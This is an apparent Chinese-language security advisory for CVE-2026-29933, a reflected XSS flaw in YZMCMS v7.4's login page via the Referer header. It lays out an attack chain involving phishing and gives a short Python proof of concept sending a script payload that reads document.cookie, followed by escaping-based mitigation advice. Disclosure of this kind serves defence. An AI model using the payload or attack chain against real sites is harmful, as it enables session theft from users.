CVE-2026-29933 CVSS 6.1 中危

CVE-2026-29933 YZMCMS反射型XSS漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-29933

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

YZMCMS

漏洞概述

YZMCMS v7.4版本的/index/login.html组件存在反射型跨站脚本（XSS）漏洞。由于系统未对HTTP请求头中的Referer字段进行有效的过滤和转义，攻击者可构造恶意请求头诱导受害者访问。一旦受害者触发，恶意JavaScript代码将在其浏览器上下文执行，导致窃取Cookie、会话劫持等风险。该漏洞CVSS评分为6.1，属于中危级别。

技术细节

该漏洞属于反射型跨站脚本漏洞（Reflected XSS），根因在于YZMCMS v7.4在处理/index/login.html请求时，直接获取并输出了HTTP请求头中的Referer值，且未进行HTML实体编码。攻击者无需经过身份认证（PR:N）即可利用此漏洞。利用过程中，攻击者利用社会工程学手段诱导受害者访问特制链接，该链接的HTTP请求头Referer字段包含恶意JavaScript代码（如<script>alert(document.cookie)</script>）。服务器接收到请求后，将Referer内容“反射”回HTML响应中。由于浏览器会解析响应中的HTML，恶意脚本随之执行。攻击者利用此机制可绕过同源策略限制，窃取用户的敏感信息（如Session ID）或执行未授权操作。

攻击链分析

STEP 1

步骤1：侦察

攻击者识别目标站点使用YZMCMS v7.4，并确认/index/login.html页面接受并处理HTTP Referer头。

STEP 2

步骤2：制作载荷

攻击者构造包含恶意JavaScript代码的HTTP Referer头，例如：<script>alert(1)</script>。

STEP 3

步骤3：诱导投递

由于该漏洞需要用户交互（UI:R），攻击者通过钓鱼邮件或社会工程学手段诱导受害者点击攻击者准备的链接。

STEP 4

步骤4：执行攻击

受害者的浏览器向服务器发送带有恶意Referer头的请求。服务器将Referer内容未过滤地反射回页面，受害者浏览器解析并执行恶意脚本。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Vulnerable component)
target_url = "http://example.com/index/login.html"

# Malicious payload injected into the Referer header
# The application fails to sanitize this header, leading to XSS
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Referer": "<script>alert(document.cookie)</script>"
}

try:
    # Send GET request with the malicious header
    response = requests.get(target_url, headers=headers)

    # Check if the payload is reflected in the response body
    if "<script>alert(document.cookie)</script>" in response.text:
        print("[+] Vulnerability Confirmed: Reflected XSS via Referer header.")
    else:
        print("[-] Vulnerability not confirmed or payload blocked.")

except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

YZMCMS v7.4

防御指南

临时缓解措施

建议管理员立即检查并修补代码，对Referer等HTTP头参数进行过滤。临时措施包括在服务器端配置过滤规则，对特殊字符（如<, >, ', ", &）进行转义，并限制Referer头的来源。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-29933
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-29933
3 Details https://www.cvedetails.com/cve/CVE-2026-29933/
4 VulDB https://vuldb.com/cve/CVE-2026-29933
5 Link https://github.com/yzmcms/yzmcms/issues/69
6 Link https://github.com/yzmcms/yzmcms/issues/69

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表